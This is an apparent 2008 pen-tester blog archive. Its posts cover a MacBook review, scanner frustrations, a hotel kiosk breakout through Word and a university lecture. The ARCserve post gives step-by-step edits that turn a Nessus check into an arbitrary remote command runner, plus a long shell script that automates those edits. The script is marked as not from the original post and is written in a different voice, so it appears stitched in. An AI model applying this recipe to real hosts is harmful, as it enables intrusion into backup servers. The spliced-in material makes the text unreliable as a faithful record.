Archive for November, 2008

Pen Testing on a Mac

Monday, November 17th, 2008

Adam talked me into buying a Macbook. It’s not overly hard to talk me into buying technology, so let’s not give him too much credit. Really, all I needed was a laptop that could do basic Internet-type stuff and run VMware. As you may have read earlier, we were swamped with scanning, so I had to push two boxes to be scanning machines, which left me with limited ability to do real work or to stay up on business stuff like email.

So my experience so far: Everyone knows Macs are pretty. They’re light and have a small, sleek form factor. The display is lovely. The keyboard is spacious and easy to use. The touchpad took a bit to get used to, but overall I’m not happy with it. It’s multi-touch capable and overall a nifty tool once you learn how to use it.

Software is actually good. VMware Fusion is nicer and more responsive than either VMware Workstation or Server. Graphics run far faster and it’s a nicer experience. Additionally, you can use “Unity” and run Windows software on the Mac desktop. The only thing that really irks me is that there isn’t a VMware Server console or a Firefox/Safari plugin to access VMware Server easily. So access is through a contrived VM-in-a-VM type thing or over X11. It’s ugly, but it’s been fairly successful.

Port is my friend. It installs basically everything you might want. It has some quirks, but being a Gentoo guy I’m used to a certain amount of pain when moving to a new OS. Port builds from source and usually works, once you learn a few tricks. I have Wireshark, libpcap, libnet, scapy, python, CANVAS, metasploit, kismet, nmap, and hping working. Nessus has an installer for Mac.

My Verizon Mobile Card works fine.

MS Office is fine. It looks a little different but it’s Office.

Hardware is blazing. I have 4 GB of RAM, a 250 GB hard drive and a 2.4 GHz Core Duo.

Overall, I think it’s a very positive experience and I’d recommend it if you have a bit of time to invest in getting familiar with the OS and getting the tools that you need onto the box.

Long Live Non-MS Bugs

Sunday, November 16th, 2008

Everyone loves to beat up on Microsoft. Hell, I do… sorry Carric. But Microsoft is slowly getting its software in order and organizations are learning to patch it very quickly. Personally, I love doing exploit development on small custom software. But in a recent case, I saw a larger software package with a known bug but no public exploit.

In particular, I’m talking about the command execution vuln released in October for BrightStor ARCserve (BID 31684).

To actually exploit the bug, use Nessus/NASL. The Nessus check already speaks the RPC protocol; the edits below turn that check into a one-shot command runner.

Find the file: arcserve_command_exec.nasl

Copy it somewhere and edit the copy. Change the following:

  1. Ditch the requirements. Comment out:
     #script_require_keys("Host/OS/smb");
     #script_require_ports(6504);
  2. Manually set the hostname. Change
     host = kb_smb_name();
     to
     host = "hostname";
     Note: an IP won’t work here; it has to be a hostname.
  3. Change the command. Change
     cmd = "ifconfig";
     to whatever you want to run.
  4. Change the output to use the display() function, so the command’s result is printed on the console when the script is run from the command line instead of going into the Nessus report.
  5. Run the NASL:
     nasl -t target_ip_or_hostname yournasl.nasl
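As an added example (not code from the original post), the shell script below applies steps 1 to 3 to a copy of the plugin with sed and then checks whether step 4 has been done. The plugin excerpt it works on is a constructed stand-in built only from the four lines quoted above; it is not the real arcserve_command_exec.nasl, and the hostname backupsrv and the commands used are assumptions. Everything it produces still runs an arbitrary command on the target when fed to nasl, so point it only at hosts you are authorized to test.

```shell
#!/bin/sh
# Added example, not from the original post: script the edits described above
# against a copy of arcserve_command_exec.nasl so the copy can be run on its
# own with `nasl -t`. Only the require/host/cmd lines quoted in the post are
# known here; the rest of the plugin is assumed, so SAMPLE_NASL is a
# constructed stand-in, not the real plugin.
SAMPLE_NASL='script_require_keys("Host/OS/smb");
  script_require_ports (6504);
host = kb_smb_name();
cmd = "ifconfig";
# ... rest of the plugin body is not reproduced here ...
'

# Escape a string for the right-hand side of a sed s|||g command.
sed_rhs() {
    printf '%s' "$1" | sed 's/[&|\\]/\\&/g'
}

# patch_nasl ORIGINAL COPY HOSTNAME COMMAND
#   1. comment out script_require_keys / script_require_ports
#   2. replace kb_smb_name() with a literal hostname (the post notes an IP won't work)
#   3. replace the hard-coded "ifconfig" with the command to run
# Step 4 (routing output through display()) depends on the plugin body, so it
# stays a manual edit; check_patched below reports whether it is still missing.
patch_nasl() {
    in="$1"; out="$2"; host="$3"; cmd="$4"
    case "$host" in
        *[!0-9.]*) ;;
        *) echo "warning: '$host' looks like an IP; kb_smb_name() expects a hostname" >&2 ;;
    esac
    h=$(sed_rhs "$host"); c=$(sed_rhs "$cmd")
    sed \
        -e 's|^\([[:space:]]*\)script_require_keys|\1#script_require_keys|' \
        -e 's|^\([[:space:]]*\)script_require_ports|\1#script_require_ports|' \
        -e "s|^\([[:space:]]*\)host = kb_smb_name();|\1host = \"$h\";|" \
        -e "s|^\([[:space:]]*\)cmd = \"ifconfig\";|\1cmd = \"$c\";|" \
        "$in" > "$out"
}

# check_patched COPY -> 0 when all four edits are in place, 1 if a step 1-3
# edit is missing, 2 if only the manual display() edit (step 4) is outstanding.
check_patched() {
    f="$1"
    grep -qE '^[[:space:]]*script_require_(keys|ports)' "$f" && return 1
    grep -qE '^[[:space:]]*host = "[^"]+";' "$f" || return 1
    grep -qE '^[[:space:]]*cmd = "[^"]+";' "$f" || return 1
    grep -q 'display(' "$f" || return 2
    return 0
}

# Demo: patch the constructed sample and print the nasl command line to run.
# nasl itself is deliberately not invoked here.
demo() {
    d=$(mktemp -d)
    printf '%s' "$SAMPLE_NASL" > "$d/arcserve_command_exec.nasl"
    patch_nasl "$d/arcserve_command_exec.nasl" "$d/mine.nasl" backupsrv "id"
    cat "$d/mine.nasl"
    echo "next: nasl -t backupsrv $d/mine.nasl"
}
demo
```

check_patched returning 2 is the normal result right after patch_nasl: it means steps 1 to 3 are done and the display() edit still has to be made by hand in the plugin body before the output will show up on the console.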

Yes, this is a bit clunky, but it’s a fairly quick way to execute arbitrary commands on the remote system. RPC (IMO) is difficult and I’d rather not deal with it if someone else already has.

The Sorry State of Vuln Scanners

Sunday, November 16th, 2008

I’ve decided that I truly HATE most vulnerability scanners. Generally I don’t trust the things, but they’ve always done a fair job of giving me a checkbox for patches and of providing a little guidance on how to attack a network. Well, recently we’ve had to scan multiple class B networks both internally and externally. It’s been brutal. Nothing finishes, results vary. It sucks hardcore.

I’ve noticed a few things. First, it’s almost impossible to buy vuln scanning software these days. Everyone wants to sell an appliance. As a consultant that doesn’t really work for me. I need to take the software with me on a laptop into a client site. An appliance makes the software basically useless.

So our Qualys box is out of the mix. Next we moved onto Nessus. Who doesn’t love Nessus? It’s not flashy but it gets the job done… right? Well no. It crashed. Over and over. It wouldn’t save state and if it crashed you had to restart.

Fuck.

Sure, you say, do small bunches at once. Well, this shouldn’t matter. It irked me that Nessus didn’t do the host management/scanning properly itself. Manually managing it is nuts. But worse, if you break scans into small bunches, you then have to merge all the results at the end.

Next I tried an old FS image. Well, that can pause scans and resume them after a crash, but it’s had previous known issues. Further, it won’t finish. It’s hung at 99% done for days. I’ve checked and it’s still running scans and producing results, but 99% for days.

I find it sad that a team of pen testers, some previously software developers, and all experienced with the tools can’t get them to work effectively.

Kiosk Fun

Sunday, November 16th, 2008

As most of my friends know, I have a tendency to run late. Well, I was running late the other day, holding up my friend Adam Pridgen. He was patiently waiting for me in the hotel lobby and started playing with the kiosk. I believe the particular software is kiosksafe. I had run into it before and knew that it did a fair job. The software not only remaps/intercepts keystrokes but it also appears to run some sort of rootkit. When a particular API is called, or possibly when a window has a certain name, the software locks the site down. It’s most unfortunate.

I threw iKat at it for fun. I saw iKat at defcon and always wanted to give it a try. It did a fair job of crashing the hell out of the Kiosk but it gave me fairly limited results.

Everyone knows the typical file-menu type hacks, trying to find something that opens up the system in a somewhat clever manner. Those didn’t work, but Office had potential. So I decided to play. In the end, I got a fair amount of access with a Word doc. :)

First, change the default file location paths for Word, so that its Open/Save dialogs start from a useful place on the drive rather than wherever the kiosk points them. I generally set it to C:\

The screenshots below show most of the process.

Double-click the icon and hopefully it works for you. cmd.exe sometimes has issues, but IE, Windows Media Player, etc. work a little better.

Sample word doc provided shortly.

Teaching at a University

Sunday, November 16th, 2008

I had the opportunity to teach a class at a university last week. It was an interesting experience. A friend of mine, Adam Pridgen, co-lectured with me. The class was a senior-level seminar-type class on computer security. I wasn’t sure exactly what to expect going into the class, but I had done a previous intro to penetration testing, so I updated that and went in.

The class started with an intro presentation by one of the students. It appears the students update the class with a somewhat recent security topic. In this case, it was a 5-minute overview of the uTorrent overflow. I was immediately nervous, as only 10-15% of my slides were at the in-depth exploitation/fuzzing level. I was worried that I would bore the class or not be able to speak with enough knowledge of particular exploits straight from memory. After the student got past the first slide or two, there were some contradictions and inaccuracies. The students didn’t jump on it, so I figured I wasn’t in too much trouble.

Shortly thereafter, Adam and I were introduced and we went into our thing. We talked about some of the common mistakes that really enable attackers to compromise networks. We discussed some of the tools and techniques we used, giving examples of situations where we had used them. Unfortunately, I don’t think they really connected. The professor got into it, but not the students. Between a couple of non-public bugs/attacks and the story of the power company CEO ignoring the out-briefing until I showed a screenshot of his email, I thought we were golden. But I guess such is the state of computer security education right now.